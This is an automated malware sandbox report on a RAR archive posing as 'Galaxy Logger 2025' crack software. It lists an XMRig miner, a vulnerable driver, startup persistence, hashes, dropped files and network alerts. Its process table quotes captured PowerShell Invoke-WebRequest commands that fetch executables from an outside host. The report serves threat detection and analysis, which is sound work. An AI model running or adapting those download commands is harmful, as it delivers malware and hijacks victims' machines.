File name:

Galaxy_Logger_2025.rar

Full analysis: https://app.any.run/tasks/d1cee4b3-f18c-43a8-a35f-5196bed0fb12
Verdict: Malicious activity
Threats:

Crypto mining malware is a resource-intensive threat that infiltrates computers with the purpose of mining cryptocurrencies. This type of threat can be deployed either on an infected machine or a compromised website. In both cases the miner will utilize the computing power of the device and its network bandwidth.

Analysis date: May 19, 2025, 11:50:23
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-exec
arch-scr
confuser
miner
xmrig
crypto-regex
winring0x64-sys
vuln-driver
evasion
pyinstaller
susp-powershell
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

41484106F771FF2E8D7B3229BDE58989

SHA1:

62A763DDC7E80C725FC4BC3A3F85D0A84A4A816F

SHA256:

124F52C0253EA18B23BCE4CA2CD7A00CF962DAA4B751F4F388140B7265CA4402

SSDEEP:

98304:i9qBUeQm3wcRHKCttrrfVdgqyZOce5kI73b2/+ogyXeTYNX5bSA4dtPsrdP/4yoE:nKnIBntNsnlZqtSqXiPxzLCXvdjw

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Generic archive extractor

      • WinRAR.exe (PID: 7324)
    • Create files in the Startup directory

      • sass.exe (PID: 6872)
      • conhost.exe (PID: 7412)
    • Vulnerable driver has been detected

      • InstallUtil.exe (PID: 2772)
    • MINER has been detected (SURICATA)

      • OmegaEngine.exe (PID: 6752)
      • svchost.exe (PID: 2196)
    • Connects to the CnC server

      • OmegaEngine.exe (PID: 6752)
    • XMRIG has been detected (YARA)

      • InstallUtil.exe (PID: 2772)
      • OmegaEngine.exe (PID: 6752)
    • XMRig has been detected

      • OmegaEngine.exe (PID: 6752)
  • SUSPICIOUS

    • The process creates files with name similar to system file names

      • WinRAR.exe (PID: 7528)
      • conhost.exe (PID: 7412)
    • Reads security settings of Internet Explorer

      • ShellExperienceHost.exe (PID: 8104)
      • InstallUtil.exe (PID: 2772)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 5892)
      • cmd.exe (PID: 6436)
    • Found regular expressions for crypto-addresses (YARA)

      • sass.exe (PID: 6872)
      • crack.exe (PID: 7620)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 3300)
      • powershell.exe (PID: 960)
    • Executable content was dropped or overwritten

      • sass.exe (PID: 6872)
      • crack.exe (PID: 632)
      • conhost.exe (PID: 7412)
      • InstallUtil.exe (PID: 2772)
      • crack.exe (PID: 6620)
      • crack.exe (PID: 7620)
    • The process drops C-runtime libraries

      • crack.exe (PID: 632)
      • crack.exe (PID: 6620)
    • Process drops legitimate windows executable

      • crack.exe (PID: 632)
      • InstallUtil.exe (PID: 2772)
      • crack.exe (PID: 6620)
    • Process drops python dynamic module

      • crack.exe (PID: 632)
      • crack.exe (PID: 6620)
    • Drops a system driver (possible attempt to evade defenses)

      • InstallUtil.exe (PID: 2772)
    • Crypto Currency Mining Activity Detected

      • svchost.exe (PID: 2196)
    • Potential Corporate Privacy Violation

      • OmegaEngine.exe (PID: 6752)
    • There is functionality for taking screenshot (YARA)

      • crack.exe (PID: 632)
      • crack.exe (PID: 7620)
    • Application launched itself

      • crack.exe (PID: 632)
      • crack.exe (PID: 6620)
    • Checks for external IP

      • svchost.exe (PID: 2196)
      • crack.exe (PID: 7620)
      • crack.exe (PID: 4728)
  • INFO

    • Manual execution by a user

      • WinRAR.exe (PID: 7528)
      • Galaxy Logger.exe (PID: 7932)
      • sass.exe (PID: 6872)
      • cmd.exe (PID: 6436)
      • cmd.exe (PID: 5892)
      • conhost.exe (PID: 7412)
      • crack.exe (PID: 632)
      • InstallUtil.exe (PID: 2772)
      • crack.exe (PID: 6620)
    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 7528)
    • Checks supported languages

      • Galaxy Logger.exe (PID: 7932)
      • ShellExperienceHost.exe (PID: 8104)
      • sass.exe (PID: 6872)
      • conhost.exe (PID: 7412)
      • crack.exe (PID: 632)
      • InstallUtil.exe (PID: 2772)
      • crack.exe (PID: 7620)
      • OmegaEngine.exe (PID: 6752)
    • Confuser has been detected (YARA)

      • Galaxy Logger.exe (PID: 7932)
    • Reads the computer name

      • Galaxy Logger.exe (PID: 7932)
      • ShellExperienceHost.exe (PID: 8104)
      • sass.exe (PID: 6872)
      • conhost.exe (PID: 7412)
      • crack.exe (PID: 632)
      • InstallUtil.exe (PID: 2772)
      • OmegaEngine.exe (PID: 6752)
    • Creates files or folders in the user directory

      • sass.exe (PID: 6872)
      • InstallUtil.exe (PID: 2772)
      • conhost.exe (PID: 7412)
    • Checks proxy server information

      • powershell.exe (PID: 3300)
      • powershell.exe (PID: 960)
      • slui.exe (PID: 8020)
    • Disables trace logs

      • powershell.exe (PID: 960)
      • powershell.exe (PID: 3300)
    • Remote server returned an error (POWERSHELL)

      • powershell.exe (PID: 960)
      • powershell.exe (PID: 3300)
    • Reads the machine GUID from the registry

      • sass.exe (PID: 6872)
      • conhost.exe (PID: 7412)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 960)
      • powershell.exe (PID: 3300)
    • The sample compiled with english language support

      • crack.exe (PID: 632)
      • InstallUtil.exe (PID: 2772)
      • crack.exe (PID: 6620)
    • Reads the software policy settings

      • slui.exe (PID: 8020)
    • Create files in a temporary directory

      • crack.exe (PID: 632)
    • The sample compiled with japanese language support

      • InstallUtil.exe (PID: 2772)
    • PyInstaller has been detected (YARA)

      • crack.exe (PID: 632)
      • crack.exe (PID: 7620)
    • Process checks computer location settings

      • InstallUtil.exe (PID: 2772)
    • Found Base64 encoded access to Windows Defender via PowerShell (YARA)

      • crack.exe (PID: 7620)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)

EXIF

ZIP

FileVersion: RAR v5
CompressedSize: 331
UncompressedSize: 537
OperatingSystem: Win32
ArchivedFileName: Galaxy_Logger_2025/Galaxy Logger 2025/acledit.bat
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
150
Monitored processes
22
Malicious processes
7
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winrar.exe no specs winrar.exe rundll32.exe no specs galaxy logger.exe no specs slui.exe shellexperiencehost.exe no specs sass.exe cmd.exe no specs conhost.exe no specs powershell.exe cmd.exe no specs conhost.exe no specs powershell.exe conhost.exe crack.exe THREAT installutil.exe #MINER omegaengine.exe conhost.exe no specs #MINER svchost.exe crack.exe crack.exe crack.exe

Process information

PID
CMD
Path
Indicators
Parent process
632"C:\Users\admin\Desktop\Galaxy_Logger_2025\Galaxy_Logger_2025\Galaxy Logger 2025\crack.exe" C:\Users\admin\Desktop\Galaxy_Logger_2025\Galaxy_Logger_2025\Galaxy Logger 2025\crack.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\desktop\galaxy_logger_2025\galaxy_logger_2025\galaxy logger 2025\crack.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
960powershell -Command "Invoke-WebRequest -Uri 'https://blackhatusa.com/svchost.exe' -OutFile 'C:\Users\admin\AppData\Local\Temp\svchost.exe' -UseBasicParsing"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
2088\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2772"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
.NET Framework installation utility
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\installutil.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
3300powershell -Command "Invoke-WebRequest -Uri 'https://blackhatusa.com/setup.exe' -OutFile 'C:\Users\admin\AppData\Local\Temp\setup.exe' -UseBasicParsing"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
4728"C:\Users\admin\Desktop\Galaxy_Logger_2025\Galaxy_Logger_2025\Galaxy Logger 2025\crack.exe" C:\Users\admin\Desktop\Galaxy_Logger_2025\Galaxy_Logger_2025\Galaxy Logger 2025\crack.exe
crack.exe
User:
admin
Integrity Level:
HIGH
Modules
Images
c:\users\admin\desktop\galaxy_logger_2025\galaxy_logger_2025\galaxy logger 2025\crack.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
5256\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5892C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\Galaxy_Logger_2025\Galaxy_Logger_2025\Galaxy Logger 2025\xpssvcs.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
6436C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\Galaxy_Logger_2025\Galaxy_Logger_2025\Galaxy Logger 2025\acledit.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
Total events
24 007
Read events
23 968
Write events
26
Delete events
13

Modification events

(PID) Process:(7324) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(7324) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(7324) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(7324) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\Galaxy_Logger_2025.rar
(PID) Process:(7324) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(7324) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(7324) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(7324) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(7324) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\ArcColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(7324) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\ArcColumnWidths
Operation:writeName:mtime
Value:
100
Executable files
126
Suspicious files
8
Text files
1 861
Unknown types
0

Dropped files

PID
Process
Filename
Type
7528WinRAR.exeC:\Users\admin\Desktop\Galaxy_Logger_2025\Galaxy_Logger_2025\Galaxy Logger 2025\Galaxy Logger.exeexecutable
MD5:8D800E0AB288BE3BA1D04A90A48FF70C
SHA256:A76C1A699D45DA1126242762D39ED445B928A1506DD6E2DFAA728EE90503BD2C
7528WinRAR.exeC:\Users\admin\Desktop\Galaxy_Logger_2025\Galaxy_Logger_2025\Galaxy Logger 2025\pnpui.battext
MD5:9EA1BB4FF775243C97272F9FC14F7658
SHA256:FC711EC126E0A47BCF178AFFD6A72A0A65785A608D7EDB85A682150583FC7273
7528WinRAR.exeC:\Users\admin\Desktop\Galaxy_Logger_2025\Galaxy_Logger_2025\Galaxy Logger 2025\acledit.battext
MD5:3B33446A78CFF74B5FB4E9A19599D174
SHA256:85CB802D09069E128067E809F25AC0850EC356DE280E67F1DC44469025ECF621
6872sass.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sass.exeexecutable
MD5:0E14E70C14597160AAAEABA06536191D
SHA256:269DD8A318E57E8445D23E76DB7C692B4C670840064168BBD1A221B363B9EE6F
960powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5szlzjxj.ska.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
960powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_je52g1n4.1pk.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7528WinRAR.exeC:\Users\admin\Desktop\Galaxy_Logger_2025\Galaxy_Logger_2025\Galaxy Logger 2025\pots.vbstext
MD5:9C21C8D0CEB71D1E29552153D26E2B99
SHA256:E64DA7B7D57B7F02677A384D0737D5F95C57A0FD49F07F53E3108DC633035900
7528WinRAR.exeC:\Users\admin\Desktop\Galaxy_Logger_2025\Galaxy_Logger_2025\Galaxy Logger 2025\nhac.vbstext
MD5:5929A32F53268FB5DA65837D95390F05
SHA256:AE1E366C62776646980F0DBA9AE6107A0842827E3FF26A3486F685646BF1A523
7528WinRAR.exeC:\Users\admin\Desktop\Galaxy_Logger_2025\Galaxy_Logger_2025\Galaxy Logger 2025\conhost.exeexecutable
MD5:4964C1751F6DB917B5C285338EFC4687
SHA256:6353B1218561A746BB3E009B611A1945BC2367B4D3FFEF7849D4AF4D369F184C
7528WinRAR.exeC:\Users\admin\Desktop\Galaxy_Logger_2025\Galaxy_Logger_2025\Galaxy Logger 2025\crack.exeexecutable
MD5:149A74F6BFF237CD3E6B66C05C455402
SHA256:01502DF95C2BABFD6753C509E957DA981D98222BBD38A21DD535DA8D55D4DFF3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
68
DNS requests
19
Threats
20

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
2104
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3216
svchost.exe
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
7808
SIHClient.exe
52.149.20.212:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
7808
SIHClient.exe
13.85.23.206:443
fe3cr.delivery.mp.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5968
slui.exe
40.91.76.224:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
960
powershell.exe
104.21.64.1:443
blackhatusa.com
CLOUDFLARENET
unknown
3300
powershell.exe
104.21.64.1:443
blackhatusa.com
CLOUDFLARENET
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
google.com
  • 142.250.186.142
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted
slscr.update.microsoft.com
  • 52.149.20.212
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.85.23.206
  • 2603:1030:7::106
whitelisted
206.23.85.13.in-addr.arpa
unknown
6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa
unknown
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted
nexusrules.officeapps.live.com
  • 52.111.229.43
whitelisted
blackhatusa.com
  • 104.21.64.1
  • 104.21.32.1
  • 104.21.48.1
  • 104.21.16.1
  • 104.21.80.1
  • 104.21.96.1
  • 104.21.112.1
unknown

Threats

PID
Process
Class
Message
6752
OmegaEngine.exe
Potential Corporate Privacy Violation
ET INFO Cryptocurrency Miner Checkin
2196
svchost.exe
Crypto Currency Mining Activity Detected
ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)
6752
OmegaEngine.exe
Potential Corporate Privacy Violation
ET INFO Cryptocurrency Miner Checkin
6752
OmegaEngine.exe
Potential Corporate Privacy Violation
ET INFO Cryptocurrency Miner Checkin
2196
svchost.exe
Misc activity
ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup
7620
crack.exe
Misc activity
ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI
6752
OmegaEngine.exe
Potential Corporate Privacy Violation
ET INFO Cryptocurrency Miner Checkin
2196
svchost.exe
Crypto Currency Mining Activity Detected
ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)
6752
OmegaEngine.exe
Potential Corporate Privacy Violation
ET INFO Cryptocurrency Miner Checkin
6752
OmegaEngine.exe
Potential Corporate Privacy Violation
ET INFO Cryptocurrency Miner Checkin
No debug info